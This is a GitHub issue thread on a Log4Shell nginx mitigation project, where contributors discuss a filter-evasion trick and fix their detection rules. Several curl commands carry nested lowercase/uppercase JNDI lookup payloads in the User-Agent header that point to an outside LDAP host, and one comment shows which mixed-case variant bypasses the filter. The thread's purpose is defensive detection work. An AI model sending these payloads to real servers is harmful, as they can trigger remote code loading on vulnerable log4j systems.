Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Another evasion method #9

Closed
Napsty opened this issue Dec 14, 2021 · 8 comments
Closed

Another evasion method #9

Napsty opened this issue Dec 14, 2021 · 8 comments

Comments

@Napsty
Copy link
Contributor

Napsty commented Dec 14, 2021

Received an anonymous tip (that sounds so weird but it's true), that certain evasion methods still work:

curl https://target.example.com -A '${${lower:${lower:jndi}}:ld${lower:ap}://45.146.164.160:1389/t}'
@igor-mendix
Copy link

Ah yes, I saw those here: Neo23x0/log4shell-detector#5 (comment)
There could be multiple nesting levels. The only way to circumvent, from the top of my head, is to run the function that strips the thing recursively until there's no more found.

@andreasnanko
Copy link
Collaborator

yes. i'm currently testing. will make PR in couple minutes

@Napsty
Copy link
Contributor Author

Napsty commented Dec 14, 2021

Also doing some local changes and tests, but I'm pretty confident you will have a working fix much quicker than me 😁

@Napsty
Copy link
Contributor Author

Napsty commented Dec 14, 2021

Possible fix for this issue: https://github.com/infiniroot/nginx-mitigate-log4shell/blob/issue-9/mitigate-log4shell.conf
It works for the mentioned evasion method:

$ curl https://target.example.com -A '${${upper:${upper:jndi}}:ld${upper:ap}://45.146.164.160:1389/t}'
2021/12/14 12:11:38 [error] 10403#10403: *12601 [lua] rewrite_by_lua(luaheader.conf:44):25: Found potential log4j attack in header user-agent:${${upper:${upper:jndi}}:ld${upper:ap}://45.146.164.160:1389/t}, client: 192.168.15.20, server: target.example.com, request: "GET / HTTP/1.1", host: "target.example.com"

$ curl https://target.example.com -A '${${lower:${lower:jndi}}:ld${lower:ap}://45.146.164.160:1389/t}'
2021/12/14 12:11:43 [error] 10403#10403: *12602 [lua] rewrite_by_lua(luaheader.conf:44):25: Found potential log4j attack in header user-agent:${${lower:${lower:jndi}}:ld${lower:ap}://45.146.164.160:1389/t}, client: 192.168.15.20, server: target.example.com, request: "GET / HTTP/1.1", host: "target.example.com"

However a mix of lower and upper is not detected:

$ curl https://target.example.com -A '${${lower:${upper:jndi}}:ld${lower:ap}://45.146.164.160:1389/t}' -I
HTTP/1.1 200 OK

@andreasnanko
Copy link
Collaborator

Did you see my PR? It fixes all of them.

@back2root
Copy link

Check out my Log4Shell-Rex, that already finds this: https://github.com/back2root/log4shell-rex

@Napsty
Copy link
Contributor Author

Napsty commented Dec 14, 2021

fixed by #12

@Napsty Napsty closed this as completed Dec 14, 2021
@karanlyons
Copy link

https://gist.github.com/karanlyons/8635587fd4fa5ddb4071cc44bb497ab6:

>>> from log4shell_regexes import *
>>> t = lambda s: [k for k in test(s)]
>>> t('${${lower:${lower:jndi}}:ld${lower:ap}://45.146.164.160:1389/t}')
['NESTED_RE', 'NESTED_INCLUDING_ESCAPES_RE', 'ANY_RE', 'ANY_INCLUDING_ESCAPES_RE', 'NESTED_OPT_RCURLY_RE', 'NESTED_INCLUDING_ESCAPES_OPT_RCURLY_RE', 'ANY_OPT_RCURLY_RE', 'ANY_INCLUDING_ESCAPES_OPT_RCURLY_RE']

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
5 participants
@karanlyons @Napsty @back2root @andreasnanko @igor-mendix